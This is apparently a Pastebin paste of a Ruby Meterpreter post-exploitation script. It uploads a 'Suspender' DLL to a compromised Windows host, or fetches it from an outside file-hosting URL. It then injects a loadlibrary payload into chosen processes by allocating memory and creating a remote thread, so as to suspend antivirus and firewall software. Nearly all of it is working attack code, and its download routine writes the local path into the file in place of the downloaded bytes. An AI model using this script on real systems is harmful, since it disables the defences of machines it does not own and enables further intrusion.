Guest User

suspend_resilientprocess.rb

a guest
Aug 23rd, 2011
211
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #
  2. # This Script use the Suspender dll's Library to suspend a windows process, ideally a resilient process like an AV or Stateless Firewall
  3. # To do this, the script uploads the library in the target system and after open the resilient process to suspend, once opened the target process,
  4. # this script generates a payload of type "windows/loadlibrary", after this, will try to allocate a memory space to load the library in the process,
  5. # write the allocated memory into the process and finally create a thread to execute the dll.
  6. # When pass 'n' seconds, the target process will be suspended and his process and threads childs, will be suspended too.
  7. # the 'n' seconds corresponds to the value specified in the dll's filename,
  8. # for example: Suspender10.dll will suspend the target process and his childs in 10 seconds. In the Script
  9. #
  10. # Version 1.0
  11. # written by Adastra.
  12. #
  13. #Variables del script
  14. require 'net/http'
  15. require 'uri'
  16.  
  17. session = client
  18. wininfo = client.sys.config.sysinfo
  19.  
  20.  
  21. # Argumentos de la función
  22. @@exec_opts = Rex::Parser::Arguments.new(
  23.     "-h" => [ false,"Help Menu."],
  24.     "-p" => [ true,"List of processes to suspend in the remote machine, each separated by ','." ],
  25.     "-s" => [ true,"Number of seconds before suspend the process(es)." ],
  26.     "-f" => [ true,"Specify the path of Suspender.dll in the local machine (attacker) to upload in the remote machine." ],
  27.     "-d" => [ true,"Download from a website in Internet. If you don't use this option neither '-f' option the default value will used to download the library from internet"]
  28. )
  29.  
  30. processes = []
  31. file_suspender_dll = nil
  32. url_suspender_dll = 'http://www.fileserve.com/file/kBSgbw4/Suspender.dll'
  33. downloadMode = true
  34. seconds_to_suspend = nil
  35.  
  36. def usage
  37.     print_line("ScriptThis Script use the Suspender dll's Library to suspend a windows process, ideally a resilient process like an AV or Stateless Firewall. ")
  38.     print_line("Para do this, the script uploads the library in the target system and after open the resilient process to suspend, once opened the target process, ")
  39.     print_line("this script generates a payload of type 'windows/loadlibrary', after this, will try to allocate a memory space to load the library in the process, ")
  40.     print_line("the allocated memory into the process and finally create a thread to execute the dll. ")
  41.     print_line("When pass 'n' seconds, the target process will be suspended and his process and threads childs, will be suspended too. ")
  42.     print_line("the 'n' seconds corresponds to the value specified in the dll's filename,  ")
  43.     print_line("for example: Suspender10.dll will suspend the target process and his childs in 10 seconds. In the Script  ")
  44.  
  45.     puts @@exec_opts.usage
  46.     print_line("Example Usage:")
  47.     print_line("run suspendProcess -p process1[,process2,processN] -f PATH_OF_SUSPENDER_DLL")
  48.     print_line("run suspendProcess -p process1[,process2,processN] -d URL_OF_SUSPENDER_DLL")
  49.     raise Rex::Script::Completed
  50. end
  51.  
  52. def uploadFile(client,file,download,url,seconds)
  53.     uploadedFile=''
  54.     if download
  55.         print_status("Trying to download Suspender from #{url}")
  56.        
  57.         suspender_dll = Net::HTTP.get URI.parse(url)
  58.         file = File.join(Msf::Config.data_directory, "Suspender#{seconds}.dll")
  59.         File.open(file, "wb") { |fd| fd.write(file) }
  60.         print_status("Suspender10.dll has been downloaded to #{file} (local machine). Please remove manually after use or keep for reuse.")
  61.     end
  62.    
  63.     if not ::File.exists?(file)
  64.             raise "File to Upload does not exists!"
  65.         else
  66.             location = client.fs.file.expand_path("%TEMP%")
  67.             fullPath = "#{location}\\Suspender#{seconds}.dll"
  68.             begin
  69.                 print_status("Uploading #{file}....")
  70.                 client.fs.file.upload_file(fullPath, file)
  71.                 print_status("successfully uploaded to #{fullPath}!")
  72.                 uploadedFile = fullPath
  73.                 rescue ::Exception => e
  74.                     print_error("Raised a exception uploading the DLL in the remote machine Maybe the library has been uploaded before... #{e}")
  75.             end
  76.     end
  77.     uploadedFile;
  78. end
  79.  
  80. def loadProcceses(session,processes_to_suspend,pathtosuspend)
  81.     ret=''
  82.    
  83.     print_status "Path Library: #{pathtosuspend}"
  84.     processes_to_suspend.each do |process|
  85.         begin
  86.             print_status "Trying to suspend the process with PID: #{process}"
  87.             payload = client.framework.payloads.create("windows/loadlibrary")
  88.             payload.datastore['DLL'] = pathtosuspend
  89.             payload.datastore['EXITFUNC'] = 'thread'
  90.             raw_payload = payload.generate
  91.             targetprocess = client.sys.process.open(process.to_i, PROCESS_ALL_ACCESS)
  92.             memory = targetprocess.memory.allocate(raw_payload.length + (raw_payload.length % 1024))
  93.             targetprocess.memory.write(memory, raw_payload)
  94.             targetprocess.thread.create(memory, 0)
  95.             rescue ::Exception => e
  96.                 print_error("Error allocating memory in the target process with PID #{process} the error is: #{e}")
  97.                 print_error("following with the next process in the list");
  98.                 ret = "#{ret} Error allocating memory in the target process with PID #{process}\n"
  99.         end
  100.         ret = "#{ret} The signal to suspend the #{process} has been submitted\n"
  101.     end
  102.     ret;
  103. end
  104.  
  105. #Main Function
  106. @@exec_opts.parse(args) {
  107. |opt, idx, val|
  108.  
  109.     case opt
  110.     when "-p"
  111.         processes.concat(val.split(","))
  112.     when "-d"
  113.         url_suspender_dll = val
  114.         print_status "The Suspender library will be downloaded from Internet, you need internet connection to make this work..."
  115.         downloadMode=true;
  116.     when "-f"
  117.         file_suspender_dll = val
  118.         print_status "File to upload: #{file_suspender_dll} "
  119.         if not ::File.exists?(file_suspender_dll)
  120.             print_error("file not found/accessible!")
  121.             usage
  122.         end
  123.         downloadMode=false;
  124.  
  125.     when "-s"
  126.         seconds_to_suspend = val
  127.         if seconds_to_suspend.to_i <= 0
  128.             print_error("Number of seconds to suspend the process must be greater than zero!")
  129.         end
  130.         print_status "Setting the number of seconds to suspend the process at #{seconds_to_suspend}"
  131.     when "-h"
  132.         usage
  133.     else
  134.         print_error "Invalid Option: #{opt}"
  135.         usage
  136.     end
  137. }
  138.  
  139. if seconds_to_suspend == nil
  140.     print_status "Setting the number of seconds to default (10 seconds) if you want to change that, you should use the '-s' option"
  141.     seconds_to_suspend = "10"
  142. end
  143. file_suspender_dll = uploadFile(client, file_suspender_dll,downloadMode,url_suspender_dll,seconds_to_suspend) #if file_suspender_dll
  144. print_status loadProcceses(session,processes,file_suspender_dll)
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×